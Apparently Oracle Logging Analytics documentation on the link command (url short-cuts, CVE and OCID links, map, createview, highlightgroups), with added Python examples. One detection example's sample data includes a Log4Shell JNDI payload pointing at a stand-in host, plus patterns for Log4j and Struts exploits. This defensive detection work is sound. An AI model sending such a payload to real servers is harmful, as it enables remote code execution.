Main Table

The groups table displays the result of the analysis by listing the groups and the corresponding values for the following default fields:

Column: Details

Field(s): The field that's used to analyze the group

Count: The number of log records in the group

Start Time: The start of the time period for which the logs are considered for the analysis

End Time: The end of the time period for which the logs are considered for the analysis

Group Duration: The duration of the log event for the group

Add URLs to Link Table

You can create links using the url function of the eval command.

In the following query, the values for Search 1, Search 2, and Search 3 are assigned URLs:

'Log Source' = 'Database Alert Logs' 
| link cluster() 
| where 'Potential Issue' = '1' 
| nlp keywords('Cluster Sample') as 'Database Error' 
| eval 'Search 1' = url('' || 'Database Error') 
| eval 'Search 2' = url('' || 'Database Error', Errors) 
| eval 'Search 3' = url(google, 'Database Error')

Figure: Link table with the links added using the url function in the eval command

In the above analysis:

  • Search 1, Search 2, and Search 3 are now clickable fields. Click a link to view the search results for those keywords.

  • Search 2 does not display the entire URL. Instead, the second parameter of the url function supplies a display name for the link, in this case Errors.

  • Search 3 is similar to Search 1, but the short-cut google is used to generate the URL. Instead of spelling out the whole URL, you can use short-cuts like this one.

Use URL Short-Cut with Custom Name

Consider the following example where a name is provided for the short-cut:

'Log Source' = 'Database Alert Logs' 
| link cluster() 
| where 'Potential Issue' = '1' 
| nlp keywords('Cluster Sample') as 'Database Error' 
| eval 'Search 1' = url('' || 'Database Error') 
| eval 'Search 2' = url('' || 'Database Error', Errors) 
| eval 'Search 3' = url(google, 'Database Error') 
| eval 'Search 4' = url(google, 'Search Using Google', 'Database Error')
| eval 'Search 5' = url(duckduckgo, 'Search Using DuckDuckGo', 'Database Error')

Figure: Oracle-defined short-cuts google and duckduckgo with their custom names

In the above example, Search 4 is similar to Search 3, differing only in the name given to the short-cut. The short-cut google has the name Search Using Google, which is displayed in the table. In Search 5, the short-cut duckduckgo has the name Search Using DuckDuckGo, which is displayed in the table. For a full list of Oracle-defined short-cuts available with the url function, see Oracle-Defined url Short-Cuts.

Use the CVE Short-cut to Link to CVE Databases

Use the cve short-cut in the url function to create a link to the CVE repository.

'Log Source' like '%Access Logs%' 
| link 'Client Host Continent' 
| addfields [ jndi | stats count as 'JNDI Count' ],
            [ URI like '%context.get(%com.opensymphony.xwork2.dispatcher.httpservletresponse%' | stats count as 'GetContext Count' ] 
| eval 'Threat ID' = if('JNDI Count' > 0,       'CVE-2021-44228',
                        'GetContext Count' > 0, 'CVE-2013-2251')
| eval Description = if('JNDI Count' > 0,       'Log4j Vulnerability - ' || 'Threat ID',
                        'GetContext Count' > 0, 'Struts Exploit - '      || 'Threat ID')
| eval CVE = url(cve, Description, 'Threat ID')
| fields -'Threat ID', -Description, -'JNDI Count', -'GetContext Count'

Figure: CVE short-cut used to link to CVE databases

In the above example, the access logs are grouped by Client Host Continent; each group is tagged with a Threat ID based on which indicator was seen, and the CVE column links to the CVE repository entry for that Threat ID.
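The classification in the query above (count two indicators per group, pick a Threat ID with a first-match-wins if(), then build a labelled link with the cve short-cut) is easy to get wrong in the ordering of the conditions, so here is the same logic written out in plain Python over constructed access log records. This is an added example, not code from the page or from Oracle Logging Analytics; the sample records, the regular expressions standing in for the jndi keyword match and the like pattern, and the CVE_BASE_URL the cve short-cut is assumed to resolve to are all assumptions made for the example.

```python
import re
from urllib.parse import quote

# Constructed sample access log records as (Client Host Continent, URI).
# Two URIs carry the indicators the query counts: a JNDI lookup string
# (CVE-2021-44228) and an OGNL context.get(...) expression (CVE-2013-2251).
SAMPLE_ACCESS_LOGS = [
    ("Europe", "/login?user=${jndi:ldap://203.0.113.5/x}"),
    ("Europe", "/index.html"),
    ("Asia", "/action?x=context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')"),
    ("North America", "/products?id=42"),
]

# Assumed target of the cve short-cut; the page does not name the repository,
# so this base URL is a placeholder to replace with the one you use.
CVE_BASE_URL = "https://nvd.nist.gov/vuln/detail/"

# Stand-ins for the query's matching: the keyword 'jndi' anywhere, and the
# 'like' pattern with % wildcards, both treated as case-insensitive.
JNDI_RE = re.compile(r"jndi", re.IGNORECASE)
GETCONTEXT_RE = re.compile(
    r"context\.get\(.*com\.opensymphony\.xwork2\.dispatcher\.httpservletresponse",
    re.IGNORECASE,
)


def classify_groups(records):
    """Group records by continent (link), count both indicators (addfields/stats),
    assign Threat ID and Description (eval if) and build the CVE link (url)."""
    groups = {}
    for continent, uri in records:
        g = groups.setdefault(continent, {"JNDI Count": 0, "GetContext Count": 0})
        if JNDI_RE.search(uri):
            g["JNDI Count"] += 1
        if GETCONTEXT_RE.search(uri):
            g["GetContext Count"] += 1
    for g in groups.values():
        # First matching condition wins, as in the nested if(); no match leaves the fields empty.
        if g["JNDI Count"] > 0:
            g["Threat ID"] = "CVE-2021-44228"
            g["Description"] = "Log4j Vulnerability - " + g["Threat ID"]
        elif g["GetContext Count"] > 0:
            g["Threat ID"] = "CVE-2013-2251"
            g["Description"] = "Struts Exploit - " + g["Threat ID"]
        else:
            g["Threat ID"] = None
            g["Description"] = None
        # url(cve, Description, 'Threat ID'): link text is the Description, target is the CVE entry.
        if g["Threat ID"]:
            g["CVE"] = (g["Description"], CVE_BASE_URL + quote(g["Threat ID"]))
        else:
            g["CVE"] = None
    return groups


if __name__ == "__main__":
    for continent, g in classify_groups(SAMPLE_ACCESS_LOGS).items():
        print(continent, g["JNDI Count"], g["GetContext Count"], g["CVE"])
```

Because the if() is evaluated in order, a group that contains both indicators is reported only as CVE-2021-44228; if you need both to surface, add one Threat ID column per indicator rather than a single nested if().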

Use the OCID Shortcut to Automatically Link to OCI Resources

Use the ocid short-cut in the url() function to create a link to the relevant OCI page for a resource. If the resource has its own console page, the URL points directly to it. Otherwise, the URL points to the Resource Query Service results for that OCID.

'Log Source' = 'OCI Audit Logs' and 'Resource ID' like 'ocid%' and 
'Resource ID' not like in ('%managementsavedsearch%', '%managementdashboard%', '%organizationsentity%', '%coreservicesworkrequest%')
| eval 'Resource Type' = substr('Resource ID', 6, indexOf('Resource ID', '.', 6))
| link 'Resource Type'
| stats earliest('Resource ID') as 'Resource ID'
| eval 'OCI Resource' = url(ocid, 'Resource ID')
| sort 'Resource Type'
| fields -'Start Time', -'End Time', -Count, -'Resource ID'

Figure: OCID short-cut used to link to OCI resources

In the above example, the resource type is extracted from each OCID in the OCI Audit Logs (the token between ocid1. and the next dot), a few internal resource types are excluded, and the earliest OCID seen for each type is turned into a link.
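The part of that query most likely to surprise a reader is the eval: substr('Resource ID', 6, indexOf('Resource ID', '.', 6)) relies on every OCID starting with the six-character prefix ocid1. and on the resource type being the next dot-delimited token. The following added Python example (not code from the page or from Oracle) reproduces the filter, the resource type extraction and the earliest-per-type grouping over constructed audit records; the OCIDs and timestamps are made up, and the Python slice is assumed to express the same intent as the substr/indexOf expression. Building the final link is left to the ocid short-cut, whose target URLs the page does not spell out.

```python
from datetime import datetime

# Constructed OCI Audit Log records as (event time, Resource ID).
# The OCIDs are invented; only the 'ocid1.<resource type>.' layout matters.
SAMPLE_AUDIT_LOGS = [
    (datetime(2024, 1, 1, 10, 5), "ocid1.instance.oc1.phx.exampleinstance0001"),
    (datetime(2024, 1, 1, 9, 50), "ocid1.instance.oc1.phx.exampleinstance0002"),
    (datetime(2024, 1, 1, 10, 0), "ocid1.bucket.oc1.phx.examplebucket0001"),
    (datetime(2024, 1, 1, 10, 2), "ocid1.managementsavedsearch.oc1.phx.examplesearch01"),
    (datetime(2024, 1, 1, 10, 3), "not-an-ocid"),
    (datetime(2024, 1, 1, 10, 4), "ocid1"),  # malformed: no resource type token
]

# Substrings excluded by the query's "not like in (...)" clause.
EXCLUDED_PATTERNS = (
    "managementsavedsearch",
    "managementdashboard",
    "organizationsentity",
    "coreservicesworkrequest",
)


def resource_type(resource_id):
    """substr('Resource ID', 6, indexOf('Resource ID', '.', 6)):
    the token after the 'ocid1.' prefix, or None if the OCID is malformed."""
    end = resource_id.find(".", 6)
    if len(resource_id) < 7 or end == -1:
        return None
    return resource_id[6:end]


def earliest_resource_per_type(records):
    """Apply the query's where clause, group by Resource Type (link), keep the
    earliest Resource ID per type (stats earliest) and sort by type.
    Returns a list of (Resource Type, Resource ID)."""
    earliest = {}
    for event_time, rid in records:
        if not rid.startswith("ocid"):
            continue
        if any(p in rid for p in EXCLUDED_PATTERNS):
            continue
        rtype = resource_type(rid)
        if rtype is None:
            continue
        if rtype not in earliest or event_time < earliest[rtype][0]:
            earliest[rtype] = (event_time, rid)
    return sorted((rtype, rid) for rtype, (_, rid) in earliest.items())


if __name__ == "__main__":
    for rtype, rid in earliest_resource_per_type(SAMPLE_AUDIT_LOGS):
        print(rtype, rid)
```

Note that the exclusion list matches anywhere in the string, exactly as the like patterns with leading and trailing % do, so a new internal resource type whose name merely contains one of those substrings is also dropped.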

Hide, Show, or Order the Table Columns

Use the fields target = ui command to control the fields that should be hidden or shown in the link groups table. You can also use this command to control the order of the fields.

Here are a few examples:

Hide all the Time fields, order the table as Size, Log Source, Count:

* | eval 'Raw Size' = unit('Raw Size', byte)
 | link 'Log Source'
 | stats sum('Raw Size') as Size
 | fields target = ui -'*Time', Size, 'Log Source', Count

Same as above, but using multiple fields commands:

* | eval 'Raw Size' = unit('Raw Size', byte)
 | link 'Log Source'
 | stats sum('Raw Size') as Size
 | fields target = ui -'*Time'
 | fields target = ui Size, 'Log Source', Count 

Combination of fields and fields target = ui (fields without target = ui performs filtering in the backend):

* | eval 'Raw Size' = unit('Raw Size', byte)
 | link 'Log Source'
 | stats sum('Raw Size') as Size
 | fields -'*Time'
 | fields target = ui Size, 'Log Source', Count 

Change the Group Alias

Each row in the link table corresponds to a Group. You can change the alias for Group, Groups, and Log Records tabs.

In the Options menu, modify the Group Alias, Groups Alias, and Log Records Alias values.

The Group Alias is used when there is only one item in the main table.

Join Multiple Groups Using the Map Command

Use the map command to join multiple sub-groups from the existing linked groups. This is useful for assigning a Session ID to related events, or for correlating events across different servers or log sources.

For example, the following query joins Out of Memory events with other events on the same server in the preceding 30 minutes, and colors these groups to highlight the context of the Out of Memory outage:

* | link Server, Label
  | createView [ *   | where Label = 'Out of Memory' 
                     | rename Entity as 'OOM Server', 'Start Time' as 'OOM Begin Time' ] as 'Out of Memory Events'
  | sort Entity, 'Start Time'
  | map [ * | where Label != 'Out of Memory' and Server = 'OOM Server' and 
                    'Start Time' >= dateAdd('OOM Begin Time', minute,-30) and 'Start Time' <= 'OOM Begin Time'
            | eval Context = Yes 
        ] using 'Out of Memory Events'
  | highlightgroups color = yellow [ * | where Context = Yes ] as '30 Minutes before Out of Memory'
  | highlightgroups priority = high [ * | where Label = 'Out of Memory' ] as 'Server Out of Memory'

Figure: Out of Memory events joined with other events within the preceding 30 minutes

See map.

Create Sub-Groups Using the Createview Command

Use the createview command to create sub-groups from the existing linked groups. This can be used in conjunction with the map command to join groups.

For example, you can group all the Out of Memory errors using the following command:

* | link Entity, Label 
  | createView  [ * | where Label = 'Out of Memory' ] as 'Out of Memory Events'

See createview.

Search and Highlight Link Groups

Use the highlightgroups command to search one or more columns in the Link results and highlight specific groups. You can optionally assign a priority to the highlighted regions; the priority determines the color of the regions. You can also specify a color explicitly.

For example:

* | link Label 
| highlightgroups priority = medium [ * | where Label in ('Log Writer Switch', 'Checkpoint Wait') ] 
| highlightgroups priority = high   [ * | where Label = 'Service Stopped' ] as Shutdown 
| highlightgroups color = #68C182   [ * | where Label = 'Service Started' ] as Startup

Figure: Chart options to select the highlighted groups

See highlightgroups.
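The three commands introduced in the preceding sections (createview, map and highlightgroups) work together in the Out of Memory query under "Join Multiple Groups Using the Map Command", and the interaction between them is easiest to see with concrete rows. The following added Python example (not code from the page or from Oracle) walks a set of constructed link groups through the same three steps: build the Out of Memory view, mark every other group on the same server that started within the 30 minutes before the OOM begin time with Context = Yes, then decide which highlight each row receives. The group rows, the field names used as dictionary keys, and the use of None for groups the map step does not touch are assumptions made for the example.

```python
from datetime import datetime, timedelta

# Constructed link groups, one per (Server, Label), with each group's Start Time.
SAMPLE_GROUPS = [
    {"Server": "app01", "Label": "Log Writer Switch", "Start Time": datetime(2024, 3, 1, 9, 40)},
    {"Server": "app01", "Label": "Checkpoint Wait",   "Start Time": datetime(2024, 3, 1, 9, 55)},
    {"Server": "app01", "Label": "Out of Memory",     "Start Time": datetime(2024, 3, 1, 10, 0)},
    {"Server": "app01", "Label": "Service Started",   "Start Time": datetime(2024, 3, 1, 10, 5)},
    {"Server": "app02", "Label": "Checkpoint Wait",   "Start Time": datetime(2024, 3, 1, 9, 50)},
    {"Server": "app01", "Label": "Checkpoint Wait",   "Start Time": datetime(2024, 3, 1, 9, 0)},
]

# dateAdd('OOM Begin Time', minute, -30)
WINDOW = timedelta(minutes=30)


def out_of_memory_events(groups):
    """createView [ * | where Label = 'Out of Memory' | rename ... ]:
    the OOM groups, renamed to OOM Server / OOM Begin Time."""
    return [{"OOM Server": g["Server"], "OOM Begin Time": g["Start Time"]}
            for g in groups if g["Label"] == "Out of Memory"]


def mark_context(groups, oom_events, window=WINDOW):
    """map [ ... | eval Context = Yes ] using 'Out of Memory Events':
    every non-OOM group on the same server whose Start Time lies in the window
    ending at the OOM begin time gets Context = Yes; other groups keep Context = None."""
    marked = []
    for g in groups:
        row = dict(g)
        row["Context"] = None
        for oom in oom_events:
            same_server = g["Server"] == oom["OOM Server"]
            in_window = oom["OOM Begin Time"] - window <= g["Start Time"] <= oom["OOM Begin Time"]
            if g["Label"] != "Out of Memory" and same_server and in_window:
                row["Context"] = "Yes"
                break
        marked.append(row)
    return marked


def highlight(marked):
    """The two highlightgroups commands, in the order the query lists them:
    returns (highlight name, color or priority) per row, or None when unhighlighted."""
    result = []
    for row in marked:
        if row["Context"] == "Yes":
            result.append(("30 Minutes before Out of Memory", "yellow"))
        elif row["Label"] == "Out of Memory":
            result.append(("Server Out of Memory", "high"))
        else:
            result.append(None)
    return result


if __name__ == "__main__":
    marked = mark_context(SAMPLE_GROUPS, out_of_memory_events(SAMPLE_GROUPS))
    for row, hl in zip(marked, highlight(marked)):
        print(row["Server"], row["Label"], row["Start Time"].time(), row["Context"], hl)
```

Two rows are worth checking against your intuition: the Service Started group five minutes after the outage is not marked, because the window only looks backwards from the OOM begin time, and the Checkpoint Wait group on app02 is not marked either, because the map joins on Server.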

Optionally, you can merge the highlighted columns to create a single column:

Figure: Merging the highlighted columns into a single column